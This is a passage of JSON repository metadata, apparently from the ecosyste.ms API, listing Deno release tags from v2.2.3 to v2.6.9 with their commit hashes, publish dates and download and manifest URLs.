and/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/deno